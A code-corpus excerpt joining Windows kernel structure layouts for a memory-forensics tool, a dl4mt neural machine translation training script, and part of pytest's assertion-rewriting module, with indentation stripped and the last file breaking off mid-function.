'History' : [ 0xc8, ['array', 20, ['_KENLISTMENT_HISTORY']]],
} ],
'_ARBITER_INTERFACE' : [ 0x18, {
'Size' : [ 0x0, ['unsigned short']],
'Version' : [ 0x2, ['unsigned short']],
'Context' : [ 0x4, ['pointer', ['void']]],
'InterfaceReference' : [ 0x8, ['pointer', ['void']]],
'InterfaceDereference' : [ 0xc, ['pointer', ['void']]],
'ArbiterHandler' : [ 0x10, ['pointer', ['void']]],
'Flags' : [ 0x14, ['unsigned long']],
} ],
'_KAPC_STATE' : [ 0x18, {
'ApcListHead' : [ 0x0, ['array', 2, ['_LIST_ENTRY']]],
'Process' : [ 0x10, ['pointer', ['_KPROCESS']]],
'KernelApcInProgress' : [ 0x14, ['unsigned char']],
'KernelApcPending' : [ 0x15, ['unsigned char']],
'UserApcPending' : [ 0x16, ['unsigned char']],
} ],
'_IA64_LOADER_BLOCK' : [ 0x4, {
'PlaceHolder' : [ 0x0, ['unsigned long']],
} ],
'_IA64_DBGKD_CONTROL_SET' : [ 0x14, {
'Continue' : [ 0x0, ['unsigned long']],
'CurrentSymbolStart' : [ 0x4, ['unsigned long long']],
'CurrentSymbolEnd' : [ 0xc, ['unsigned long long']],
} ],
'_DEVICE_RELATIONS' : [ 0x8, {
'Count' : [ 0x0, ['unsigned long']],
'Objects' : [ 0x4, ['array', 1, ['pointer', ['_DEVICE_OBJECT']]]],
} ],
'_IMAGE_ROM_OPTIONAL_HEADER' : [ 0x38, {
'Magic' : [ 0x0, ['unsigned short']],
'MajorLinkerVersion' : [ 0x2, ['unsigned char']],
'MinorLinkerVersion' : [ 0x3, ['unsigned char']],
'SizeOfCode' : [ 0x4, ['unsigned long']],
'SizeOfInitializedData' : [ 0x8, ['unsigned long']],
'SizeOfUninitializedData' : [ 0xc, ['unsigned long']],
'AddressOfEntryPoint' : [ 0x10, ['unsigned long']],
'BaseOfCode' : [ 0x14, ['unsigned long']],
'BaseOfData' : [ 0x18, ['unsigned long']],
'BaseOfBss' : [ 0x1c, ['unsigned long']],
'GprMask' : [ 0x20, ['unsigned long']],
'CprMask' : [ 0x24, ['array', 4, ['unsigned long']]],
'GpValue' : [ 0x34, ['unsigned long']],
} ],
'_ALPC_COMPLETION_LIST_HEADER' : [ 0x300, {
'StartMagic' : [ 0x0, ['unsigned long long']],
'TotalSize' : [ 0x8, ['unsigned long']],
'ListOffset' : [ 0xc, ['unsigned long']],
'ListSize' : [ 0x10, ['unsigned long']],
'BitmapOffset' : [ 0x14, ['unsigned long']],
'BitmapSize' : [ 0x18, ['unsigned long']],
'DataOffset' : [ 0x1c, ['unsigned long']],
'DataSize' : [ 0x20, ['unsigned long']],
'AttributeFlags' : [ 0x24, ['unsigned long']],
'AttributeSize' : [ 0x28, ['unsigned long']],
'State' : [ 0x80, ['_ALPC_COMPLETION_LIST_STATE']],
'LastMessageId' : [ 0x88, ['unsigned long']],
'LastCallbackId' : [ 0x8c, ['unsigned long']],
'PostCount' : [ 0x100, ['unsigned long']],
'ReturnCount' : [ 0x180, ['unsigned long']],
'LogSequenceNumber' : [ 0x200, ['unsigned long']],
'UserLock' : [ 0x280, ['_RTL_SRWLOCK']],
'EndMagic' : [ 0x288, ['unsigned long long']],
} ],
'_IMAGE_DEBUG_DIRECTORY' : [ 0x1c, {
'Characteristics' : [ 0x0, ['unsigned long']],
'TimeDateStamp' : [ 0x4, ['unsigned long']],
'MajorVersion' : [ 0x8, ['unsigned short']],
'MinorVersion' : [ 0xa, ['unsigned short']],
'Type' : [ 0xc, ['unsigned long']],
'SizeOfData' : [ 0x10, ['unsigned long']],
'AddressOfRawData' : [ 0x14, ['unsigned long']],
'PointerToRawData' : [ 0x18, ['unsigned long']],
} ],
'_ETW_WMITRACE_WORK' : [ 0xf0, {
'LoggerId' : [ 0x0, ['unsigned long']],
'LoggerName' : [ 0x8, ['array', 65, ['unsigned char']]],
'FileName' : [ 0x49, ['array', 129, ['unsigned char']]],
'MaximumFileSize' : [ 0xcc, ['unsigned long']],
'MinBuffers' : [ 0xd0, ['unsigned long']],
'MaxBuffers' : [ 0xd4, ['unsigned long']],
'BufferSize' : [ 0xd8, ['unsigned long']],
'Mode' : [ 0xdc, ['unsigned long']],
'FlushTimer' : [ 0xe0, ['unsigned long']],
'MatchAny' : [ 0x8, ['unsigned long long']],
'MatchAll' : [ 0x10, ['unsigned long long']],
'EnableProperty' : [ 0x18, ['unsigned long']],
'Guid' : [ 0x1c, ['_GUID']],
'Level' : [ 0x2c, ['unsigned char']],
'Status' : [ 0xe8, ['long']],
} ],
'_DEVICE_MAP' : [ 0x34, {
'DosDevicesDirectory' : [ 0x0, ['pointer', ['_OBJECT_DIRECTORY']]],
'GlobalDosDevicesDirectory' : [ 0x4, ['pointer', ['_OBJECT_DIRECTORY']]],
'DosDevicesDirectoryHandle' : [ 0x8, ['pointer', ['void']]],
'ReferenceCount' : [ 0xc, ['unsigned long']],
'DriveMap' : [ 0x10, ['unsigned long']],
'DriveType' : [ 0x14, ['array', 32, ['unsigned char']]],
} ],
'_HEAP_DEBUGGING_INFORMATION' : [ 0x1c, {
'InterceptorFunction' : [ 0x0, ['pointer', ['void']]],
'InterceptorValue' : [ 0x4, ['unsigned short']],
'ExtendedOptions' : [ 0x8, ['unsigned long']],
'StackTraceDepth' : [ 0xc, ['unsigned long']],
'MinTotalBlockSize' : [ 0x10, ['unsigned long']],
'MaxTotalBlockSize' : [ 0x14, ['unsigned long']],
'HeapLeakEnumerationRoutine' : [ 0x18, ['pointer', ['void']]],
} ],
'_IO_RESOURCE_LIST' : [ 0x28, {
'Version' : [ 0x0, ['unsigned short']],
'Revision' : [ 0x2, ['unsigned short']],
'Count' : [ 0x4, ['unsigned long']],
'Descriptors' : [ 0x8, ['array', 1, ['_IO_RESOURCE_DESCRIPTOR']]],
} ],
'_MMBANKED_SECTION' : [ 0x20, {
'BasePhysicalPage' : [ 0x0, ['unsigned long']],
'BasedPte' : [ 0x4, ['pointer', ['_MMPTE']]],
'BankSize' : [ 0x8, ['unsigned long']],
'BankShift' : [ 0xc, ['unsigned long']],
'BankedRoutine' : [ 0x10, ['pointer', ['void']]],
'Context' : [ 0x14, ['pointer', ['void']]],
'CurrentMappedPte' : [ 0x18, ['pointer', ['_MMPTE']]],
'BankTemplate' : [ 0x1c, ['array', 1, ['_MMPTE']]],
} ],
'_WHEA_ERROR_RECORD_HEADER_FLAGS' : [ 0x4, {
'Recovered' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'PreviousError' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'Simulated' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'Reserved' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 32, native_type='unsigned long')]],
'AsULONG' : [ 0x0, ['unsigned long']],
} ],
'_XSAVE_AREA_HEADER' : [ 0x40, {
'Mask' : [ 0x0, ['unsigned long long']],
'Reserved' : [ 0x8, ['array', 7, ['unsigned long long']]],
} ],
'_HEAP_VIRTUAL_ALLOC_ENTRY' : [ 0x20, {
'Entry' : [ 0x0, ['_LIST_ENTRY']],
'ExtraStuff' : [ 0x8, ['_HEAP_ENTRY_EXTRA']],
'CommitSize' : [ 0x10, ['unsigned long']],
'ReserveSize' : [ 0x14, ['unsigned long']],
'BusyBlock' : [ 0x18, ['_HEAP_ENTRY']],
} ],
'_PNP_DEVICE_COMPLETION_REQUEST' : [ 0x38, {
'ListEntry' : [ 0x0, ['_LIST_ENTRY']],
'DeviceNode' : [ 0x8, ['pointer', ['_DEVICE_NODE']]],
'Context' : [ 0xc, ['pointer', ['void']]],
'CompletionState' : [ 0x10, ['Enumeration', dict(target = 'long', choices = {768: 'DeviceNodeUnspecified', 769: 'DeviceNodeUninitialized', 770: 'DeviceNodeInitialized', 771: 'DeviceNodeDriversAdded', 772: 'DeviceNodeResourcesAssigned', 773: 'DeviceNodeStartPending', 774: 'DeviceNodeStartCompletion', 775: 'DeviceNodeStartPostWork', 776: 'DeviceNodeStarted', 777: 'DeviceNodeQueryStopped', 778: 'DeviceNodeStopped', 779: 'DeviceNodeRestartCompletion', 780: 'DeviceNodeEnumeratePending', 781: 'DeviceNodeEnumerateCompletion', 782: 'DeviceNodeAwaitingQueuedDeletion', 783: 'DeviceNodeAwaitingQueuedRemoval', 784: 'DeviceNodeQueryRemoved', 785: 'DeviceNodeRemovePendingCloses', 786: 'DeviceNodeRemoved', 787: 'DeviceNodeDeletePendingCloses', 788: 'DeviceNodeDeleted', 789: 'MaxDeviceNodeState'})]],
'IrpPended' : [ 0x14, ['unsigned long']],
'Status' : [ 0x18, ['long']],
'Information' : [ 0x1c, ['pointer', ['void']]],
'WorkItem' : [ 0x20, ['_WORK_QUEUE_ITEM']],
'FailingDriver' : [ 0x30, ['pointer', ['_DRIVER_OBJECT']]],
'ReferenceCount' : [ 0x34, ['long']],
} ],
'_EVENT_FILTER_HEADER' : [ 0x18, {
'Id' : [ 0x0, ['unsigned short']],
'Version' : [ 0x2, ['unsigned char']],
'Reserved' : [ 0x3, ['array', 5, ['unsigned char']]],
'InstanceId' : [ 0x8, ['unsigned long long']],
'Size' : [ 0x10, ['unsigned long']],
'NextOffset' : [ 0x14, ['unsigned long']],
} ],
'_WAIT_CONTEXT_BLOCK' : [ 0x28, {
'WaitQueueEntry' : [ 0x0, ['_KDEVICE_QUEUE_ENTRY']],
'DeviceRoutine' : [ 0x10, ['pointer', ['void']]],
'DeviceContext' : [ 0x14, ['pointer', ['void']]],
'NumberOfMapRegisters' : [ 0x18, ['unsigned long']],
'DeviceObject' : [ 0x1c, ['pointer', ['void']]],
'CurrentIrp' : [ 0x20, ['pointer', ['void']]],
'BufferChainingDpc' : [ 0x24, ['pointer', ['_KDPC']]],
} ],
'_SECTION_OBJECT' : [ 0x18, {
'StartingVa' : [ 0x0, ['pointer', ['void']]],
'EndingVa' : [ 0x4, ['pointer', ['void']]],
'Parent' : [ 0x8, ['pointer', ['void']]],
'LeftChild' : [ 0xc, ['pointer', ['void']]],
'RightChild' : [ 0x10, ['pointer', ['void']]],
'Segment' : [ 0x14, ['pointer', ['_SEGMENT_OBJECT']]],
} ],
'_CM_NAME_CONTROL_BLOCK' : [ 0x10, {
'Compressed' : [ 0x0, ['unsigned char']],
'RefCount' : [ 0x2, ['unsigned short']],
'NameHash' : [ 0x4, ['_CM_NAME_HASH']],
'ConvKey' : [ 0x4, ['unsigned long']],
'NextHash' : [ 0x8, ['pointer', ['_CM_KEY_HASH']]],
'NameLength' : [ 0xc, ['unsigned short']],
'Name' : [ 0xe, ['array', 1, ['wchar']]],
} ],
}
| gpl-2.0 |
nyu-dl/dl4mt-tutorial | session2/train_nmt_all.py | 10 | 2194 | import numpy
import os
from nmt import train
def main(job_id, params):
print params
validerr = train(saveto=params['model'][0],
reload_=params['reload'][0],
dim_word=params['dim_word'][0],
dim=params['dim'][0],
n_words=params['n-words'][0],
n_words_src=params['n-words'][0],
decay_c=params['decay-c'][0],
clip_c=params['clip-c'][0],
lrate=params['learning-rate'][0],
optimizer=params['optimizer'][0],
maxlen=50,
batch_size=32,
valid_batch_size=32,
datasets=['/ichec/home/users/%s/data/all.en.concat.shuf.gz'%os.environ['USER'],
'/ichec/home/users/%s/data/all.fr.concat.shuf.gz'%os.environ['USER']],
valid_datasets=['/ichec/home/users/%s/data/newstest2011.en.tok'%os.environ['USER'],
'/ichec/home/users/%s/data/newstest2011.fr.tok'%os.environ['USER']],
dictionaries=['/ichec/home/users/%s/data/all.en.concat.gz.pkl'%os.environ['USER'],
'/ichec/home/users/%s/data/all.fr.concat.gz.pkl'%os.environ['USER']],
validFreq=5000,
dispFreq=10,
saveFreq=5000,
sampleFreq=1000,
use_dropout=params['use-dropout'][0],
overwrite=False)
return validerr
if __name__ == '__main__':
main(0, {
'model': ['/ichec/home/users/%s/models/model_session2_all.npz'%os.environ['USER']],
'dim_word': [500],
'dim': [1024],
'n-words': [30000],
'optimizer': ['adadelta'],
'decay-c': [0.],
'clip-c': [1.],
'use-dropout': [False],
'learning-rate': [0.0001],
'reload': [False]})
| bsd-3-clause |
randyzingle/tools | kub/services/archive/cdk/python/sample-app/.env/lib/python3.6/site-packages/_pytest/assertion/rewrite.py | 1 | 40384 | """Rewrite assertion AST to produce nice error messages"""
import ast
import errno
import functools
import importlib.abc
import importlib.machinery
import importlib.util
import io
import itertools
import marshal
import os
import struct
import sys
import tokenize
import types
from typing import Dict
from typing import List
from typing import Optional
from typing import Set
from typing import Tuple
import atomicwrites
from _pytest._io.saferepr import saferepr
from _pytest._version import version
from _pytest.assertion import util
from _pytest.assertion.util import ( # noqa: F401
format_explanation as _format_explanation,
)
from _pytest.pathlib import fnmatch_ex
from _pytest.pathlib import PurePath
# pytest caches rewritten pycs in __pycache__.
PYTEST_TAG = "{}-pytest-{}".format(sys.implementation.cache_tag, version)
PYC_EXT = ".py" + (__debug__ and "c" or "o")
PYC_TAIL = "." + PYTEST_TAG + PYC_EXT
class AssertionRewritingHook(importlib.abc.MetaPathFinder):
"""PEP302/PEP451 import hook which rewrites asserts."""
def __init__(self, config):
self.config = config
try:
self.fnpats = config.getini("python_files")
except ValueError:
self.fnpats = ["test_*.py", "*_test.py"]
self.session = None
self._rewritten_names = set() # type: Set[str]
self._must_rewrite = set() # type: Set[str]
# flag to guard against trying to rewrite a pyc file while we are already writing another pyc file,
# which might result in infinite recursion (#3506)
self._writing_pyc = False
self._basenames_to_check_rewrite = {"conftest"}
self._marked_for_rewrite_cache = {} # type: Dict[str, bool]
self._session_paths_checked = False
def set_session(self, session):
self.session = session
self._session_paths_checked = False
# Indirection so we can mock calls to find_spec originated from the hook during testing
_find_spec = importlib.machinery.PathFinder.find_spec
def find_spec(self, name, path=None, target=None):
if self._writing_pyc:
return None
state = self.config._assertstate
if self._early_rewrite_bailout(name, state):
return None
state.trace("find_module called for: %s" % name)
spec = self._find_spec(name, path)
if (
# the import machinery could not find a file to import
spec is None
# this is a namespace package (without `__init__.py`)
# there's nothing to rewrite there
# python3.5 - python3.6: `namespace`
# python3.7+: `None`
or spec.origin in {None, "namespace"}
# we can only rewrite source files
or not isinstance(spec.loader, importlib.machinery.SourceFileLoader)
# if the file doesn't exist, we can't rewrite it
or not os.path.exists(spec.origin)
):
return None
else:
fn = spec.origin
if not self._should_rewrite(name, fn, state):
return None
return importlib.util.spec_from_file_location(
name,
fn,
loader=self,
submodule_search_locations=spec.submodule_search_locations,
)
def create_module(self, spec):
return None # default behaviour is fine
def exec_module(self, module):
fn = module.__spec__.origin
state = self.config._assertstate
self._rewritten_names.add(module.__name__)
# The requested module looks like a test file, so rewrite it. This is
# the most magical part of the process: load the source, rewrite the
# asserts, and load the rewritten source. We also cache the rewritten
# module code in a special pyc. We must be aware of the possibility of
# concurrent pytest processes rewriting and loading pycs. To avoid
# tricky race conditions, we maintain the following invariant: The
# cached pyc is always a complete, valid pyc. Operations on it must be
# atomic. POSIX's atomic rename comes in handy.
write = not sys.dont_write_bytecode
cache_dir = os.path.join(os.path.dirname(fn), "__pycache__")
if write:
ok = try_mkdir(cache_dir)
if not ok:
write = False
state.trace("read only directory: {}".format(os.path.dirname(fn)))
cache_name = os.path.basename(fn)[:-3] + PYC_TAIL
pyc = os.path.join(cache_dir, cache_name)
# Notice that even if we're in a read-only directory, I'm going
# to check for a cached pyc. This may not be optimal...
co = _read_pyc(fn, pyc, state.trace)
if co is None:
state.trace("rewriting {!r}".format(fn))
source_stat, co = _rewrite_test(fn, self.config)
if write:
self._writing_pyc = True
try:
_write_pyc(state, co, source_stat, pyc)
finally:
self._writing_pyc = False
else:
state.trace("found cached rewritten pyc for {!r}".format(fn))
exec(co, module.__dict__)
def _early_rewrite_bailout(self, name, state):
"""This is a fast way to get out of rewriting modules. Profiling has
shown that the call to PathFinder.find_spec (inside of the find_spec
from this class) is a major slowdown, so, this method tries to
filter what we're sure won't be rewritten before getting to it.
"""
if self.session is not None and not self._session_paths_checked:
self._session_paths_checked = True
for path in self.session._initialpaths:
# Make something as c:/projects/my_project/path.py ->
# ['c:', 'projects', 'my_project', 'path.py']
parts = str(path).split(os.path.sep)
# add 'path' to basenames to be checked.
self._basenames_to_check_rewrite.add(os.path.splitext(parts[-1])[0])
# Note: conftest already by default in _basenames_to_check_rewrite.
parts = name.split(".")
if parts[-1] in self._basenames_to_check_rewrite:
return False
# For matching the name it must be as if it was a filename.
path = PurePath(os.path.sep.join(parts) + ".py")
for pat in self.fnpats:
# if the pattern contains subdirectories ("tests/**.py" for example) we can't bail out based
# on the name alone because we need to match against the full path
if os.path.dirname(pat):
return False
if fnmatch_ex(pat, path):
return False
if self._is_marked_for_rewrite(name, state):
return False
state.trace("early skip of rewriting module: {}".format(name))
return True
def _should_rewrite(self, name, fn, state):
# always rewrite conftest files
if os.path.basename(fn) == "conftest.py":
state.trace("rewriting conftest file: {!r}".format(fn))
return True
if self.session is not None:
if self.session.isinitpath(fn):
state.trace(
"matched test file (was specified on cmdline): {!r}".format(fn)
)
return True
# modules not passed explicitly on the command line are only
# rewritten if they match the naming convention for test files
fn_path = PurePath(fn)
for pat in self.fnpats:
if fnmatch_ex(pat, fn_path):
state.trace("matched test file {!r}".format(fn))
return True
return self._is_marked_for_rewrite(name, state)
def _is_marked_for_rewrite(self, name: str, state):
try:
return self._marked_for_rewrite_cache[name]
except KeyError:
for marked in self._must_rewrite:
if name == marked or name.startswith(marked + "."):
state.trace(
"matched marked file {!r} (from {!r})".format(name, marked)
)
self._marked_for_rewrite_cache[name] = True
return True
self._marked_for_rewrite_cache[name] = False
return False
def mark_rewrite(self, *names: str) -> None:
"""Mark import names as needing to be rewritten.
The named module or package as well as any nested modules will
be rewritten on import.
"""
already_imported = (
set(names).intersection(sys.modules).difference(self._rewritten_names)
)
for name in already_imported:
mod = sys.modules[name]
if not AssertionRewriter.is_rewrite_disabled(
mod.__doc__ or ""
) and not isinstance(mod.__loader__, type(self)):
self._warn_already_imported(name)
self._must_rewrite.update(names)
self._marked_for_rewrite_cache.clear()
def _warn_already_imported(self, name):
from _pytest.warning_types import PytestAssertRewriteWarning
from _pytest.warnings import _issue_warning_captured
_issue_warning_captured(
PytestAssertRewriteWarning(
"Module already imported so cannot be rewritten: %s" % name
),
self.config.hook,
stacklevel=5,
)
def get_data(self, pathname):
"""Optional PEP302 get_data API."""
with open(pathname, "rb") as f:
return f.read()
def _write_pyc(state, co, source_stat, pyc):
# Technically, we don't have to have the same pyc format as
# (C)Python, since these "pycs" should never be seen by builtin
# import. However, there's little reason deviate.
try:
with atomicwrites.atomic_write(pyc, mode="wb", overwrite=True) as fp:
fp.write(importlib.util.MAGIC_NUMBER)
# as of now, bytecode header expects 32-bit numbers for size and mtime (#4903)
mtime = int(source_stat.st_mtime) & 0xFFFFFFFF
size = source_stat.st_size & 0xFFFFFFFF
# "<LL" stands for 2 unsigned longs, little-ending
fp.write(struct.pack("<LL", mtime, size))
fp.write(marshal.dumps(co))
except EnvironmentError as e:
state.trace("error writing pyc file at {}: errno={}".format(pyc, e.errno))
# we ignore any failure to write the cache file
# there are many reasons, permission-denied, __pycache__ being a
# file etc.
return False
return True
def _rewrite_test(fn, config):
"""read and rewrite *fn* and return the code object."""
stat = os.stat(fn)
with open(fn, "rb") as f:
source = f.read()
tree = ast.parse(source, filename=fn)
rewrite_asserts(tree, source, fn, config)
co = compile(tree, fn, "exec", dont_inherit=True)
return stat, co
def _read_pyc(source, pyc, trace=lambda x: None):
"""Possibly read a pytest pyc containing rewritten code.
Return rewritten code if successful or None if not.
"""
try:
fp = open(pyc, "rb")
except IOError:
return None
with fp:
try:
stat_result = os.stat(source)
mtime = int(stat_result.st_mtime)
size = stat_result.st_size
data = fp.read(12)
except EnvironmentError as e:
trace("_read_pyc({}): EnvironmentError {}".format(source, e))
return None
# Check for invalid or out of date pyc file.
if (
len(data) != 12
or data[:4] != importlib.util.MAGIC_NUMBER
or struct.unpack("<LL", data[4:]) != (mtime & 0xFFFFFFFF, size & 0xFFFFFFFF)
):
trace("_read_pyc(%s): invalid or out of date pyc" % source)
return None
try:
co = marshal.load(fp)
except Exception as e:
trace("_read_pyc({}): marshal.load error {}".format(source, e))
return None
if not isinstance(co, types.CodeType):
trace("_read_pyc(%s): not a code object" % source)
return None
return co
def rewrite_asserts(mod, source, module_path=None, config=None):
"""Rewrite the assert statements in mod."""
AssertionRewriter(module_path, config, source).run(mod)
def _saferepr(obj):
"""Get a safe repr of an object for assertion error messages.
The assertion formatting (util.format_explanation()) requires
newlines to be escaped since they are a special character for it.
Normally assertion.util.format_explanation() does this but for a
custom repr it is possible to contain one of the special escape
sequences, especially '\n{' and '\n}' are likely to be present in
JSON reprs.
"""
return saferepr(obj).replace("\n", "\\n")
def _format_assertmsg(obj):
"""Format the custom assertion message given.
For strings this simply replaces newlines with '\n~' so that
util.format_explanation() will preserve them instead of escaping
newlines. For other objects saferepr() is used first.
"""
# reprlib appears to have a bug which means that if a string
# contains a newline it gets escaped, however if an object has a
# .__repr__() which contains newlines it does not get escaped.
# However in either case we want to preserve the newline.
replaces = [("\n", "\n~"), ("%", "%%")]
if not isinstance(obj, str):
obj = saferepr(obj)
replaces.append(("\\n", "\n~"))
for r1, r2 in replaces:
obj = obj.replace(r1, r2)
return obj
def _should_repr_global_name(obj):
if callable(obj):
return False
try:
return not hasattr(obj, "__name__")
except Exception:
return True
def _format_boolop(explanations, is_or):
explanation = "(" + (is_or and " or " or " and ").join(explanations) + ")"
if isinstance(explanation, str):
return explanation.replace("%", "%%")
else:
return explanation.replace(b"%", b"%%")
def _call_reprcompare(ops, results, expls, each_obj):
# type: (Tuple[str, ...], Tuple[bool, ...], Tuple[str, ...], Tuple[object, ...]) -> str
for i, res, expl in zip(range(len(ops)), results, expls):
try:
done = not res
except Exception:
done = True
if done:
break
if util._reprcompare is not None:
custom = util._reprcompare(ops[i], each_obj[i], each_obj[i + 1])
if custom is not None:
return custom
return expl
def _call_assertion_pass(lineno, orig, expl):
# type: (int, str, str) -> None
if util._assertion_pass is not None:
util._assertion_pass(lineno, orig, expl)
def _check_if_assertion_pass_impl():
# type: () -> bool
"""Checks if any plugins implement the pytest_assertion_pass hook
in order not to generate explanation unecessarily (might be expensive)"""
return True if util._assertion_pass else False
UNARY_MAP = {ast.Not: "not %s", ast.Invert: "~%s", ast.USub: "-%s", ast.UAdd: "+%s"}
BINOP_MAP = {
ast.BitOr: "|",
ast.BitXor: "^",
ast.BitAnd: "&",
ast.LShift: "<<",
ast.RShift: ">>",
ast.Add: "+",
ast.Sub: "-",
ast.Mult: "*",
ast.Div: "/",
ast.FloorDiv: "//",
ast.Mod: "%%", # escaped for string formatting
ast.Eq: "==",
ast.NotEq: "!=",
ast.Lt: "<",
ast.LtE: "<=",
ast.Gt: ">",
ast.GtE: ">=",
ast.Pow: "**",
ast.Is: "is",
ast.IsNot: "is not",
ast.In: "in",
ast.NotIn: "not in",
ast.MatMult: "@",
}
def set_location(node, lineno, col_offset):
"""Set node location information recursively."""
def _fix(node, lineno, col_offset):
if "lineno" in node._attributes:
node.lineno = lineno
if "col_offset" in node._attributes:
node.col_offset = col_offset
for child in ast.iter_child_nodes(node):
_fix(child, lineno, col_offset)
_fix(node, lineno, col_offset)
return node
def _get_assertion_exprs(src: bytes) -> Dict[int, str]:
"""Returns a mapping from {lineno: "assertion test expression"}"""
ret = {} # type: Dict[int, str]
depth = 0
lines = [] # type: List[str]
assert_lineno = None # type: Optional[int]
seen_lines = set() # type: Set[int]
def _write_and_reset() -> None:
nonlocal depth, lines, assert_lineno, seen_lines
assert assert_lineno is not None
ret[assert_lineno] = "".join(lines).rstrip().rstrip("\\")
depth = 0
lines = []
assert_lineno = None
seen_lines = set()
tokens = tokenize.tokenize(io.BytesIO(src).readline)
for tp, source, (lineno, offset), _, line in tokens:
if tp == tokenize.NAME and source == "assert":
assert_lineno = lineno
elif assert_lineno is not None:
# keep track of depth for the assert-message `,` lookup
if tp == tokenize.OP and source in "([{":
depth += 1
elif tp == tokenize.OP and source in ")]}":
depth -= 1
if not lines:
lines.append(line[offset:])
seen_lines.add(lineno)
# a non-nested comma separates the expression from the message
elif depth == 0 and tp == tokenize.OP and source == ",":
# one line assert with message
if lineno in seen_lines and len(lines) == 1:
offset_in_trimmed = offset + len(lines[-1]) - len(line)
lines[-1] = lines[-1][:offset_in_trimmed]
# multi-line assert with message
elif lineno in seen_lines:
lines[-1] = lines[-1][:offset]
# multi line assert with escapd newline before message
else:
lines.append(line[:offset])
_write_and_reset()
elif tp in {tokenize.NEWLINE, tokenize.ENDMARKER}:
_write_and_reset()
elif lines and lineno not in seen_lines:
lines.append(line)
seen_lines.add(lineno)
return ret
class AssertionRewriter(ast.NodeVisitor):
"""Assertion rewriting implementation.
The main entrypoint is to call .run() with an ast.Module instance,
this will then find all the assert statements and rewrite them to
provide intermediate values and a detailed assertion error. See
http://pybites.blogspot.be/2011/07/behind-scenes-of-pytests-new-assertion.html
for an overview of how this works.
The entry point here is .run() which will iterate over all the
statements in an ast.Module and for each ast.Assert statement it
finds call .visit() with it. Then .visit_Assert() takes over and
is responsible for creating new ast statements to replace the
original assert statement: it rewrites the test of an assertion
to provide intermediate values and replace it with an if statement
which raises an assertion error with a detailed explanation in
case the expression is false and calls pytest_assertion_pass hook
if expression is true.
For this .visit_Assert() uses the visitor pattern to visit all the
AST nodes of the ast.Assert.test field, each visit call returning
an AST node and the corresponding explanation string. During this
state is kept in several instance attributes:
:statements: All the AST statements which will replace the assert
statement.
:variables: This is populated by .variable() with each variable
used by the statements so that they can all be set to None at
the end of the statements.
:variable_counter: Counter to create new unique variables needed
by statements. Variables are created using .variable() and
have the form of "@py_assert0".
:expl_stmts: The AST statements which will be executed to get
data from the assertion. This is the code which will construct
the detailed assertion message that is used in the AssertionError
or for the pytest_assertion_pass hook.
:explanation_specifiers: A dict filled by .explanation_param()
with %-formatting placeholders and their corresponding
expressions to use in the building of an assertion message.
This is used by .pop_format_context() to build a message.
:stack: A stack of the explanation_specifiers dicts maintained by
.push_format_context() and .pop_format_context() which allows
to build another %-formatted string while already building one.
This state is reset on every new assert statement visited and used
by the other visitors.
"""
def __init__(self, module_path, config, source):
super().__init__()
self.module_path = module_path
self.config = config
if config is not None:
self.enable_assertion_pass_hook = config.getini(
"enable_assertion_pass_hook"
)
else:
self.enable_assertion_pass_hook = False
self.source = source
@functools.lru_cache(maxsize=1)
def _assert_expr_to_lineno(self):
return _get_assertion_exprs(self.source)
def run(self, mod: ast.Module) -> None:
"""Find all assert statements in *mod* and rewrite them."""
if not mod.body:
# Nothing to do.
return
# Insert some special imports at the top of the module but after any
# docstrings and __future__ imports.
aliases = [
ast.alias("builtins", "@py_builtins"),
ast.alias("_pytest.assertion.rewrite", "@pytest_ar"),
]
doc = getattr(mod, "docstring", None)
expect_docstring = doc is None
if doc is not None and self.is_rewrite_disabled(doc):
return
pos = 0
lineno = 1
for item in mod.body:
if (
expect_docstring
and isinstance(item, ast.Expr)
and isinstance(item.value, ast.Str)
):
doc = item.value.s
if self.is_rewrite_disabled(doc):
return
expect_docstring = False
elif (
not isinstance(item, ast.ImportFrom)
or item.level > 0
or item.module != "__future__"
):
lineno = item.lineno
break
pos += 1
else:
lineno = item.lineno
imports = [
ast.Import([alias], lineno=lineno, col_offset=0) for alias in aliases
]
mod.body[pos:pos] = imports
# Collect asserts.
nodes = [mod] # type: List[ast.AST]
while nodes:
node = nodes.pop()
for name, field in ast.iter_fields(node):
if isinstance(field, list):
new = [] # type: List
for i, child in enumerate(field):
if isinstance(child, ast.Assert):
# Transform assert.
new.extend(self.visit(child))
else:
new.append(child)
if isinstance(child, ast.AST):
nodes.append(child)
setattr(node, name, new)
elif (
isinstance(field, ast.AST)
# Don't recurse into expressions as they can't contain
# asserts.
and not isinstance(field, ast.expr)
):
nodes.append(field)
@staticmethod
def is_rewrite_disabled(docstring):
return "PYTEST_DONT_REWRITE" in docstring
def variable(self):
"""Get a new variable."""
# Use a character invalid in python identifiers to avoid clashing.
name = "@py_assert" + str(next(self.variable_counter))
self.variables.append(name)
return name
def assign(self, expr):
"""Give *expr* a name."""
name = self.variable()
self.statements.append(ast.Assign([ast.Name(name, ast.Store())], expr))
return ast.Name(name, ast.Load())
def display(self, expr):
"""Call saferepr on the expression."""
return self.helper("_saferepr", expr)
def helper(self, name, *args):
"""Call a helper in this module."""
py_name = ast.Name("@pytest_ar", ast.Load())
attr = ast.Attribute(py_name, name, ast.Load())
return ast.Call(attr, list(args), [])
def builtin(self, name):
"""Return the builtin called *name*."""
builtin_name = ast.Name("@py_builtins", ast.Load())
return ast.Attribute(builtin_name, name, ast.Load())
def explanation_param(self, expr):
"""Return a new named %-formatting placeholder for expr.
This creates a %-formatting placeholder for expr in the
current formatting context, e.g. ``%(py0)s``. The placeholder
and expr are placed in the current format context so that it
can be used on the next call to .pop_format_context().
"""
specifier = "py" + str(next(self.variable_counter))
self.explanation_specifiers[specifier] = expr
return "%(" + specifier + ")s"
def push_format_context(self):
"""Create a new formatting context.
The format context is used for when an explanation wants to
have a variable value formatted in the assertion message. In
this case the value required can be added using
.explanation_param(). Finally .pop_format_context() is used
to format a string of %-formatted values as added by
.explanation_param().
"""
self.explanation_specifiers = {} # type: Dict[str, ast.expr]
self.stack.append(self.explanation_specifiers)
def pop_format_context(self, expl_expr):
"""Format the %-formatted string with current format context.
The expl_expr should be an ast.Str instance constructed from
the %-placeholders created by .explanation_param(). This will
add the required code to format said string to .expl_stmts and
return the ast.Name instance of the formatted string.
"""
current = self.stack.pop()
if self.stack:
self.explanation_specifiers = self.stack[-1]
keys = [ast.Str(key) for key in current.keys()]
